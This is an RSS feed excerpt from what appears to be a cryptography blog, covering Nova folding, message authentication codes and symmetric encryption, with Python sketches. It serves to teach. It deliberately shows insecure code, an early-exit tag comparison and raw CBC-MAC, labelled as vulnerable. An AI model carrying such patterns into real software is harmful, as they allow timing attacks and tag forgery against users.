\[ F(t)=(\sum_y A_{ML}(t,y)z_{ML}(y))\times (\sum_y B_{ML}(t,y)z_{ML}(y))-(u\sum_y C_{ML}(t,y)z_{ML}(y)+E_{ML}(t)) \]&lt;br &#x2F;&gt;
where we sum over all values of \( y \) in \( {0,1}^s \). We only need to check whether the following identity holds for a randomly sampled \( \tau \)&lt;br &#x2F;&gt;
\[ \sum_x g(\tau,x)F(x)=0 \]&lt;br &#x2F;&gt;
for \( x \) in \( {0,1}^s \), with \( g(x,y)=1 \) for \( x=y \) and zero otherwise. We can check that equality by applying the sum-check protocol to the polynomial \( p(t)=g(\tau,t)F(t) \).&lt;&#x2F;p&gt;
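&lt;p&gt;The identity works because \( \sum_x g(\tau,x)F(x) \) is precisely the evaluation at \( \tau \) of the multilinear extension of \( F \). A small, hypothetical sketch over a toy field (the function names are illustrative, not from any Nova codebase):&lt;&#x2F;p&gt;

```python
# Hypothetical sketch: evaluating a multilinear extension via the eq polynomial.
from itertools import product

P = 97  # toy prime field

def eq(tau, x):
    # eq(tau, x) = prod_i (tau_i * x_i + (1 - tau_i) * (1 - x_i)); this is the
    # polynomial g above: 1 when tau = x on the Boolean hypercube, 0 otherwise
    r = 1
    for t, b in zip(tau, x):
        r = r * ((t * b + (1 - t) * (1 - b)) % P) % P
    return r

def mle_eval(f_vals, tau, s):
    # Sum over x in {0,1}^s of eq(tau, x) * f(x): the multilinear extension of f at tau
    return sum(eq(tau, x) * f_vals[x] for x in product((0, 1), repeat=s)) % P
```

&lt;p&gt;In particular, \( \sum_x g(\tau,x)F(x)=0 \) for random \( \tau \) forces the multilinear extension of \( F \) to vanish at \( \tau \), which (with high probability) means \( F \) is zero on the whole hypercube.&lt;&#x2F;p&gt;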
&lt;h2 id=&quot;advantages&quot;&gt;Advantages&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The verifier circuit is lightweight, with little more than 20,000 constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * It does not need to perform FFTs, so no special elliptic curves are required. The only condition is that the curve is sufficiently secure (that is, the discrete log problem over it must be hard).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The verification is not based on elliptic curve pairings, so expensive operations and pairing-friendly curves are unnecessary.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Nova is a new protocol for realizing incrementally verifiable computation based on a new cryptographic primitive called a folding scheme. The key idea is to merge two instances of a given NP statement into a single one. To be able to do so, we have to make changes to the R1CS to include an error term \( E \) and a scalar \( u \) to obtain a relaxed R1CS, over which we can build an efficient folding scheme. We also need additively-homomorphic polynomial commitment schemes, such as Pedersen commitments. The resulting construction has a small verifier circuit (around 20,000 constraints in R1CS), obtaining fast proof generation and verification. This has many applications to public ledgers, verifiable delay functions, and proof aggregation.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Message Authentication Codes</title>
          <pubDate>Wed, 18 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/message-authentication-codes/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/message-authentication-codes/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/message-authentication-codes/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;We &lt;a href=&quot;&#x2F;symmetric-encryption&#x2F;&quot;&gt;discussed previously&lt;&#x2F;a&gt; how to ensure message confidentiality between two parties, Alice and Bob. We saw that we could use a symmetric key cipher, such as AES or ChaCha20, to encrypt messages between Alice and Bob so that only they can read them. However, when Bob gets a message from Alice, how does he know that it is truly from Alice, or that a malicious party has not changed it? Here is where authenticity comes into play. For example, a man-in-the-middle (MIM) can try to impersonate Alice and Bob during a key exchange in a Diffie-Hellman protocol. The scheme works as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Alice chooses a random number \\( a \\) and computes \\( g^a \\) and sends it.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The MIM gets \\( g^a \\), chooses \\( a^\prime \\) and sends Bob \\( g^{ a^\prime } \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Bob chooses a random number \\( b \\) and computes \\( g^b \\) and sends it.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. The MIM gets \\( g^b \\), chooses \\( b^\prime \\) and sends Alice \\( g^{ b^\prime } \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Alice gets the shared secret \\( g^{ ab^\prime } \\), and Bob gets \\( g^{ a^\prime b } \\); their messages get decrypted by the MIM, who can read them and then re-encrypt them to Alice or Bob with the corresponding secret key.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Authenticity is also crucial in contexts where confidentiality is not needed. For example, we could have an authentication tag that gives proof of the integrity of files on our hard drive. If an attacker gets access to our hard drive, he may try to change files in our operating system. The authentication tags would tell us if there has been a modification in our files or not.&lt;&#x2F;p&gt;
&lt;p&gt;A message authentication code (MAC) is a primitive which allows us to ensure the integrity of a given message. Several constructions can be used, depending on the context. Two commonly used constructions are CBC-MAC and HMAC. MACs play an essential role in internet protocol security (IPsec), secure shell (ssh), and transport layer security (TLS), generating authentication codes for each packet that is transmitted.&lt;&#x2F;p&gt;
&lt;p&gt;We will discuss later how to combine authentication codes with encryption to obtain authenticated encryption, which can guarantee semantic security (that is, the attacker cannot learn anything from a given ciphertext) and ciphertext integrity, leading to secure encryption against tampering.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-a-mac&quot;&gt;What is a MAC?&lt;&#x2F;h2&gt;
&lt;p&gt;A message authentication code is a pair of efficient algorithms, signing and verification, \( S, V \), which work over a set of messages and tags and take keys. The key space is the set of n-bit strings \( {0,1 }^n \). If we know the key, we can add authentication tags and verify them. The signing algorithm takes a message \( m \) and the key \( k \) and outputs a tag \( t \):&lt;br &#x2F;&gt;
\[ S(k,m)=t \]&lt;br &#x2F;&gt;
The verification algorithm gets a tag, \( t \), the key \( k \), and the message \( m \) and outputs a boolean variable \( b \), which tells us whether the tag corresponds to the given message:&lt;br &#x2F;&gt;
\[ V(k,t,m)=b \]&lt;br &#x2F;&gt;
The MAC construction has to be secure to be helpful; otherwise, an attacker could forge messages. We say that an attacker has produced a forgery if he can find a valid pair \( m,t \) without knowing the key.&lt;&#x2F;p&gt;
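&lt;p&gt;As a concrete, minimal sketch of the \( S,V \) interface, using HMAC-SHA256 from the Python standard library as the tagging algorithm (the function names simply mirror the notation above):&lt;&#x2F;p&gt;

```python
# Minimal S, V sketch using HMAC-SHA256 from the standard library.
import hmac
import hashlib

def S(k: bytes, m: bytes) -> bytes:
    # Signing: tag = HMAC-SHA256(k, m)
    return hmac.new(k, m, hashlib.sha256).digest()

def V(k: bytes, t: bytes, m: bytes) -> bool:
    # Verification: recompute the tag and compare in constant time
    return hmac.compare_digest(S(k, m), t)
```

&lt;p&gt;Verification simply recomputes the tag and compares it with the received one; the comparison must run in constant time, for reasons discussed in the section on timing attacks.&lt;&#x2F;p&gt;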
&lt;h2 id=&quot;attacks-against-mac&quot;&gt;Attacks against MAC&lt;&#x2F;h2&gt;
&lt;p&gt;To see whether a MAC is secure, we need to establish the powers of the attacker and what would be a successful attack.&lt;&#x2F;p&gt;
&lt;p&gt;We suppose the attacker can perform a chosen message attack (CMA). In simple words, the attacker is free to choose any messages \( m_i \) and can get access to the corresponding tag \( t_i=S(k,m_i) \) by having Alice or Bob calculate the tag. He does not have access to the key, though. While this may seem to grant the attacker unrealistic power (he can get the tag of any message), it models situations that do take place in the real world. The goal of the attacker is, given pairs \( (t_i,m_i) \) for \( i=1,2,…,j \), to find a new valid pair \( t,m \), where \( m\neq m_i \). This pair is called an existential forgery. We will say the MAC is secure if it is existentially unforgeable under CMA.&lt;&#x2F;p&gt;
&lt;p&gt;MACs could also be rendered insecure by replay attacks. In this situation, an adversary may capture a message and its tag from Alice to Bob and then use it to impersonate Alice by sending the same message to Bob sometime later. To avoid this, MACs include a message number (increased with each new message) or a time stamp, which is authenticated with the original message in the MAC.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;construction-of-mac-by-pseudo-random-functions-prf&quot;&gt;Construction of MAC by pseudo-random functions (PRF)&lt;&#x2F;h2&gt;
&lt;p&gt;We saw examples of pseudo-random functions when we talked about block ciphers. We mentioned that these behave as pseudo-random permutations, taking a message \( m \) and mapping it to one of all the possible output messages. For example, the AES block cipher is a function \( f:K\times \{0,1 \}^{128} \rightarrow \{0,1 \}^{128} \), taking a 16-byte message and outputting a random-looking 16-byte string.&lt;&#x2F;p&gt;
&lt;p&gt;We can construct a MAC from a given PRF, taking messages in a space \( X \) (for example, messages up to GB long), and outputting a tag in \( Y \) (for example, a 128-bit string), \( g: K\times X \rightarrow Y \) by doing&lt;br &#x2F;&gt;
\[ t=g(k,m) \]&lt;br &#x2F;&gt;
This MAC is secure provided that the PRF \( g \) is secure and that the output set is large enough; that is, the number of elements \( \vert Y \vert \) is greater than \( 2^{80} \).&lt;&#x2F;p&gt;
&lt;p&gt;If the tag space is small, the attacker has a high probability of outputting the correct tag.&lt;&#x2F;p&gt;
&lt;p&gt;Block ciphers and cryptographic hash functions behave as pseudo-random functions; therefore, their use in constructing MAC is reasonable. In the first case, we get CBC-MAC, while in the second, HMAC.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;cbc-mac&quot;&gt;CBC-MAC&lt;&#x2F;h2&gt;
&lt;p&gt;We need a pseudo-random permutation (PRP) to build CBC-MAC, such as a block cipher. We can picture the MAC function as \( f:K^2\times M \rightarrow {0,1}^n\). It takes two different keys, \(k_1,k_2 \), a message and outputs a tag. In the case of using AES as PRP, \( n=128 \). Given that AES works with 16-byte words, the message is split into equal blocks of 16 bytes. We can always pad the message conveniently if it is not a multiple of 16. Let’s call \( m_0,m_1,…m_N \) the blocks composing the message and \( E(k,m)=C \) the AES encryption function, where the first argument is the key and the second is the message block. The algorithm proceeds as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Compute \\( t_0 = E( k_1 , m_0 )\\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For \\( j = 1, ... ,N \\) do  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;\( t_{ j-1 }^\prime = t_{ j-1 }\oplus m_j \)&lt;br &#x2F;&gt;
\( t_j = E(k_1 , t_{ j-1 }^\prime)\)&lt;br &#x2F;&gt;
3. Compute \( t = E(k_2 , t_N) \)&lt;&#x2F;p&gt;
&lt;p&gt;This last step is critical to making the MAC secure against existential forgery. If step 3 were omitted, we could perform the following chosen message attack:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Choose \\( m \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Request \\( t = E(k,m) \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Output the forgery: the message \\( m \vert \vert t\oplus m \\) also has tag \\( t \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can see that we have obtained a valid pair by performing the calculations:&lt;br &#x2F;&gt;
\( f(k,m\vert \vert t\oplus m)=E(k,E(k,m)\oplus t\oplus m)=E(k,t\oplus t\oplus m)=E(k,m)=t \)&lt;br &#x2F;&gt;
where we have used the fact that \( a\oplus a\oplus b=b\) (XORing \( b \) twice with the same bitstring \( a \) returns \( b \)).&lt;&#x2F;p&gt;
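&lt;p&gt;This forgery is easy to reproduce. The sketch below is a toy illustration (a hash-based PRF stands in for the AES block cipher): it implements raw CBC-MAC without step 3 and mounts the attack. With the final encryption under \( k_2 \), the attacker never sees the chaining value \( t \) and so cannot build the forged block \( t\oplus m \):&lt;&#x2F;p&gt;

```python
# Raw CBC-MAC (no final encryption) and the length-extension forgery against it.
import hashlib

BLOCK = 16

def E(k: bytes, block: bytes) -> bytes:
    # Toy PRF standing in for the AES block cipher (illustration only)
    return hashlib.sha256(k + block).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def raw_cbc_mac(k: bytes, blocks) -> bytes:
    # CBC-MAC *without* step 3: insecure, as the forgery below shows
    t = E(k, blocks[0])
    for m in blocks[1:]:
        t = E(k, xor(t, m))
    return t

def cbc_mac(k1: bytes, k2: bytes, blocks) -> bytes:
    # Secure variant: re-encrypt the last chaining value under a second key,
    # hiding t so the attacker can no longer form the block t xor m
    return E(k2, raw_cbc_mac(k1, blocks))
```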
&lt;h2 id=&quot;nmac&quot;&gt;NMAC&lt;&#x2F;h2&gt;
&lt;p&gt;The NMAC construction is based on the cascade construction. In this case, the NMAC function is \( g:K^2\times M\rightarrow K \). As in CBC-MAC, we split the message into \( N \) equal blocks, \( m_0 , m_1 , … m_{N-1} \). To obtain the tag,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Set \\( t_0 = k_1 \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For \\(i = 1,...N \\) perform \\( F(t_{i-1} , m_{i-1}) = t_i\\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Pad \\( t_N \\) with a fixed pad element \\( \mathrm{fpad} \\) so that its length corresponds to the size of the elements in \\( M \\), obtaining \\( t_{N+1} \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Compute \\( t=F(k_2 , t_{N+1}) \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Step 2 corresponds to the cascade. Step 4 is necessary once again, this time to prevent a length extension attack: if we know the result of the cascade \( \mathrm{cascade}(k,m)\), we can append any string \( w \) and obtain the output of the cascade \( \mathrm{cascade}(k,m\vert \vert w)\).&lt;&#x2F;p&gt;
&lt;p&gt;Even though we could use NMAC with AES, this proves inconvenient in practice since there is a rapid change in the key scheduling. The strategy works best with cryptographic hash functions.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;pmac&quot;&gt;PMAC&lt;&#x2F;h2&gt;
&lt;p&gt;The problem with the NMAC and CBC-MAC is that they are carried out sequentially. This can be inconvenient in the case of very long messages since we cannot leverage multiple processors to accelerate the calculation. Parallel MAC solves this problem by adopting a different scheme. To build PMAC, we need two functions: a pseudo-random function \( F:K\times M\rightarrow M \) and a function taking a key and a counter \( P:K\times \mathbb{Z_0 }^+ \rightarrow K \). To compute the tag:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. For \\( i = 0, 1 ,...N \\) compute \\( {m_i}^\prime = m_i \oplus P(k_1 ,i)\\) and \\( t_i = F(k_2 , {m_i}^\prime) \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Compute \\( t^\prime = t_0 \oplus t_1 \oplus ...\oplus t_N \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Obtain \\( t = F(k_2 , t^\prime) \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;universal-hashing-and-one-time-mac&quot;&gt;Universal hashing and One-time MAC&lt;&#x2F;h2&gt;
&lt;p&gt;A faster alternative to PRF-based MACs is the one-time MAC; it can be secure against all adversaries, even computationally unbounded ones. One-time MACs are based on universal hash functions, which are weaker than cryptographic hash functions (they do not need to be collision-resistant) but operate much faster. A universal hash function (UHF) takes a key, \( k \), and a message, \( m \), and gives the hash \( h_m = UHF(k,m) \). The only security requirement is that for any two distinct messages \( m_1 , m_2 \), the probability that they hash to the same value for a random key is negligible:&lt;br &#x2F;&gt;
\[Pr(UHF(k,m_1) = UHF(k,m_2), k\leftarrow K) = \mathrm{neg}\ \forall m_1\neq m_2 \]&lt;&#x2F;p&gt;
&lt;p&gt;First, we break the message into \( N \) blocks as before. Then, we interpret each of these blocks as a number over a large finite field (that is, every block is an element from \( {0,1,2,..,q-1} \)). We can take each of them as the coefficient of a polynomial. To build the MAC, we fix a large prime \( q \) and take two random integers \( a,b \) in \( {1,2,…q-1}\). The signing algorithm is&lt;br &#x2F;&gt;
\[ S(a,b,m) = a^{N+1} + m_{N} a^N + m_{N-1} a^{N-1} + … + m_1 a + b \mod{q} \]&lt;br &#x2F;&gt;
The algorithm evaluates the polynomial with coefficients given by \( m_i \) at point \( a \), adds \( b \), and reduces the result modulo \( q \) so that the tag is also an element in the finite field \( \mathbb{F}_q \).&lt;&#x2F;p&gt;
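&lt;p&gt;A minimal sketch of this polynomial-evaluation MAC over a toy prime (hypothetical code, not Poly1305 itself), using Horner’s rule to evaluate \( a^{N+1}+m_Na^N+\dots+m_1a+b \bmod q \):&lt;&#x2F;p&gt;

```python
# Hypothetical sketch of the polynomial one-time MAC (not Poly1305 itself).
Q = 101  # toy prime modulus; Poly1305 uses q = 2 ** 130 - 5

def poly_mac(a, b, blocks, q=Q):
    # S(a, b, m) = a^(N+1) + m_N a^N + ... + m_1 a + b (mod q), via Horner's rule
    acc = 1  # seeds the leading a^(N+1) term
    for m in reversed(blocks):  # blocks = [m_1, ..., m_N]
        acc = (acc * a + m) % q
    return (acc * a + b) % q
```

&lt;p&gt;Note that tagging two messages under the same key pair \( (a,b) \) is already fatal: the tags of the all-zero message and of the message with \( m_1=1 \) differ exactly by \( a \), which is the weakness discussed next.&lt;&#x2F;p&gt;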
&lt;p&gt;Poly1305 is an example of such a construction and is used in combination with AES or ChaCha20 (we will soon see why we need to combine them) to provide a fast MAC, used, for example, by Google, to secure HTTPS connections. In particular, Poly1305 breaks the messages into blocks of 16 bytes, interpreting each as a 129-bit number in little-endian form by appending an additional bit to each block. The modulus is \(q = 2^{130}-5 \), and the final result is reduced by taking the remainder by \( 2^{128} \).&lt;&#x2F;p&gt;
&lt;p&gt;The problem with one-time MACs is that we can authenticate only one message. An attacker can easily break the scheme to obtain both \( a \) and \( b \). Note that if the attacker submits a message where each \( m_i=0 \), then \( S(a,b,m)=a^{N+1}+b \). Then, he can send the message \( m_1=1,m_i=0\ \forall \ i&amp;gt;1 \) and get \( S(a,b,m)=a^{N+1}+a+b \mod{q} \); subtracting the two tags recovers \( a \), and \( b \) then follows from either tag. We can solve this problem by improving the construction and incorporating a pseudo-random function.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;carter-wegman-mac&quot;&gt;Carter-Wegman MAC&lt;&#x2F;h2&gt;
&lt;p&gt;The Carter-Wegman MAC combines a PRF with a one-time MAC. If \( F:K_F\times {0,1}^n \rightarrow {0,1}^n\) is the pseudo-random function and \( S(k_S,m) \) is a secure one-time MAC, the Carter-Wegman MAC is calculated as follows: Pick at random \( r \) in \( {0,1}^n \) and calculate&lt;br &#x2F;&gt;
\[ CW(k_F,k_S,m)=(r,F(k_F,r)\oplus S(k_S,m)) \]&lt;br &#x2F;&gt;
The input to the pseudo-random function is small, and even though \( F \) can be slower than \( S \), it will be computed very fast. We leave the message to the one-time MAC, which can deal efficiently even with large messages.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;hmac&quot;&gt;HMAC&lt;&#x2F;h2&gt;
&lt;p&gt;To construct HMAC we need a key, \( k \), inner and outer paddings, \( \mathrm{ipad,opad} \), and a secure cryptographic hash function \( H:{0,1}^\star\rightarrow {0,1}^n \). The signing algorithm is&lt;br &#x2F;&gt;
\[ S(k,m)=H((k\oplus \mathrm{opad})\vert \vert H((k\oplus \mathrm{ipad})\vert \vert m)) \]&lt;br &#x2F;&gt;
HMAC follows the NMAC cascade: the outer hash plays the role of the final keyed application, preventing length extension attacks on the inner hash.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;timing-attacks-on-tag-verification&quot;&gt;Timing attacks on tag verification&lt;&#x2F;h2&gt;
&lt;p&gt;MAC verification can be subject to bugs or attacks if not done correctly. One standard attack against poorly implemented MAC verification schemes is the timing attack. In the verification, the verifier takes the key, \( k \), and the message \( m \), computes the authentication tag \( t^\prime \), and compares it with the received tag \( t \). One naïve way to do this is by performing a byte-by-byte comparison,&lt;br &#x2F;&gt;
\[ t^\prime[i] == t[i]\]&lt;br &#x2F;&gt;
The problem with checking this way is that the comparison stops as soon as two bytes differ: if, say, byte number 3 mismatches, an attacker learns that the first two bytes were correct. The attacker can try different values for the third byte and measure how long verification takes; if it increases, he knows he got another byte right. The process continues until he exhausts the bytes in the tag, obtaining the valid tag \( t \) for a message \( m \) and producing an existential forgery. The lesson is to ensure that verification runs in constant time so that no information about the tag is leaked.&lt;&#x2F;p&gt;
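&lt;p&gt;In Python, for example, the vulnerable early-exit comparison and its constant-time replacement look like this (a minimal sketch; hmac.compare_digest is the standard library’s constant-time comparison):&lt;&#x2F;p&gt;

```python
# Variable-time vs constant-time tag comparison (sketch).
import hmac

def naive_verify(t_prime: bytes, t: bytes) -> bool:
    # Vulnerable: returns at the first mismatching byte, leaking timing information
    if len(t_prime) != len(t):
        return False
    for a, b in zip(t_prime, t):
        if a != b:
            return False
    return True

def constant_time_verify(t_prime: bytes, t: bytes) -> bool:
    # hmac.compare_digest takes time independent of where the bytes differ
    return hmac.compare_digest(t_prime, t)
```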
&lt;h2 id=&quot;need-to-change-the-key&quot;&gt;Need to change the key&lt;&#x2F;h2&gt;
&lt;p&gt;To be secure, MAC tags need to be long enough; if not, they could be subject to brute-force attacks. We can find bounds for the number of messages we can MAC before changing keys. For example, in CBC-MAC, which outputs tags in \( \{0,1 \}^n \), if the adversary can query \( q \) messages of length \( \ell \), then we need that&lt;br &#x2F;&gt;
\[ \frac{q^2 \ell^2 }{ 2^n } \ll 1\]&lt;br &#x2F;&gt;
This means that \( q\ell \ll 2^{ n&#x2F;2 } \). If we use AES, where \( n=128 \), and we consider \( 2^{-32}\approx 2\times 10^{-10}\) to be sufficiently small, then \( q\ell \leq 2^{48} \). Given that 1 GB of data is \( 2^{30} \) bytes, we can authenticate many messages of up to several GB each before changing the key.&lt;&#x2F;p&gt;
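&lt;p&gt;The bound is easy to recompute: under the condition \( (q\ell)^2&#x2F;2^n \leq 2^{-32} \), the largest admissible \( q\ell \) is \( \sqrt{2^{n-32}} \). A quick sanity check:&lt;&#x2F;p&gt;

```python
# Sanity check of the rekeying bound: (q*l)^2 / 2^n must stay below 2^adv_exp.
import math

def max_blocks(n, adv_exp):
    # Largest q*l satisfying (q*l)^2 / 2^n at most 2^adv_exp
    return math.isqrt(2 ** (n + adv_exp))
```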
&lt;p&gt;In the case of HMAC with SHA-256, we have \( n=256 \), and the number of messages we can tag before reaching the limit is \( q \ll 2^{256&#x2F;2} \), which, for our case, could be something like \( 2^{100}\approx 10^{30} \).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Encryption schemes, such as AES or ChaCha20, offer confidentiality but cannot ensure the authenticity of messages or that an attacker has not modified them. The lack of authenticity can lead to devastating attacks and break cryptographic schemes. Message authentication codes (MACs) provide ways to ensure the integrity of the message, which we can combine with encryption schemes to provide authenticated encryption. To be secure, MACs need to satisfy existential unforgeability under chosen message attacks; given a new message \( m \), an attacker should not be able to generate a valid authentication tag \( t \), even if he has access to other valid pairs \( m_i,t_i \). MACs can be obtained from pseudo-random functions (such as hash functions or block ciphers, like AES) or universal hash functions, each offering advantages and disadvantages in terms of speed, size, processing in parallel, etc.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Symmetric encryption</title>
          <pubDate>Tue, 17 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/symmetric-encryption/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/symmetric-encryption/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/symmetric-encryption/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Encryption has been the main application of cryptography for a very long time. Its goal is to transform a message into another one and send it through an insecure channel, such that only the intended parties (who know all the elements necessary to reverse the transformation) can read it while looking like absolute nonsense to everybody else. For example, suppose that you are a general during a war, and you need to communicate the battle plan to your reinforcement battalions (which are still far from you) and launch a surprise attack at the precise moment. If you sent some messenger with an unencrypted letter containing the plans, then anyone reading the letter would know your strategy and act accordingly. Besides, the messenger could betray you, exchange that information with your enemies, and thwart your masterminded tactic.&lt;&#x2F;p&gt;
&lt;p&gt;Encryption uses an algorithm called a cipher and some key to change the message into a random-looking text. More precisely, it takes a plaintext and outputs a ciphertext through some mathematical computations. The ciphertext can only be decrypted if the key is known. In modern encryption, only the key is secret; the details of the encryption algorithm are publicly known. This construction is in accordance with Kerckhoffs’s principle, which states that, in a cryptographic system, only the key should be secret. In older times, people tried to hide the message by using unknown algorithms or strategies, hoping that the enemy would not be able to figure out the secret; we call this security through obscurity. Needless to say, this strategy has failed numerous times with catastrophic consequences.&lt;&#x2F;p&gt;
&lt;p&gt;Symmetric encryption is widely used today, and there are efficient algorithms, some even implemented in hardware. Examples of symmetric encryption algorithms are AES (Advanced Encryption Standard), 3DES, ChaCha, Salsa, Twofish, Blowfish, and Serpent. In this type of encryption, we use the same key to encrypt and decrypt messages (therefore, if someone can send encrypted messages, he can decrypt them as well). We will see in a later chapter that there is asymmetric encryption (or public key cryptography), where we have two different keys: a public key (used to encrypt messages) and a private key (used to decrypt).&lt;&#x2F;p&gt;
&lt;p&gt;Once we have the key, we can send secure messages between the parties. It is unlikely that unwanted parties will decrypt them, thanks to the math and heuristics behind it and the appropriate security levels. However, we find ourselves with the problem of agreeing on the key between the involved parties. If we tried sending it in plaintext over an insecure channel, it could be compromised, and the symmetric encryption would be pointless since adversaries could have obtained it. We will focus in a later post on how to perform key exchanges.&lt;&#x2F;p&gt;
&lt;p&gt;There are two main ciphers types for symmetric encryption: block and stream ciphers. We will analyze their characteristics in the following sections.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;formalization&quot;&gt;Formalization&lt;&#x2F;h2&gt;
&lt;p&gt;We have two parties wanting to communicate securely, which we will call Alice and Bob (for A and B, respectively). Alice wants to send Bob a plaintext, \( P \), so that only Bob can read it and learn its contents. They have previously agreed on a common secret key, \( k \), and they will use some algorithm, such as AES. The encryption algorithm is some function, \( E \), taking the plaintext and the key and outputting the ciphertext \( C \):&lt;br &#x2F;&gt;
\[ E(P,k)=C \]&lt;br &#x2F;&gt;
The decryption algorithm, \( D \), on the other hand, takes the ciphertext and the key and returns the plaintext&lt;br &#x2F;&gt;
\[ D(C,k)=P \]&lt;&#x2F;p&gt;
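&lt;p&gt;A toy illustration of the \( E,D \) interface (a hypothetical XOR-keystream cipher built from a hash; real systems use ChaCha20 or AES, not this construction):&lt;&#x2F;p&gt;

```python
# Toy XOR-keystream cipher (illustration only; real systems use ChaCha20 or AES).
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    # Derive n pseudo-random bytes by hashing key || counter (toy construction)
    blocks = []
    for ctr in range((n + 31) // 32):  # SHA-256 yields 32 bytes per call
        blocks.append(hashlib.sha256(key + ctr.to_bytes(8, "little")).digest())
    return b"".join(blocks)[:n]

def E(P: bytes, k: bytes) -> bytes:
    # Encryption: XOR the plaintext with the key-derived keystream
    return bytes(p ^ s for p, s in zip(P, keystream(k, len(P))))

def D(C: bytes, k: bytes) -> bytes:
    # Decryption is the same XOR, so D(E(P, k), k) = P
    return E(C, k)
```

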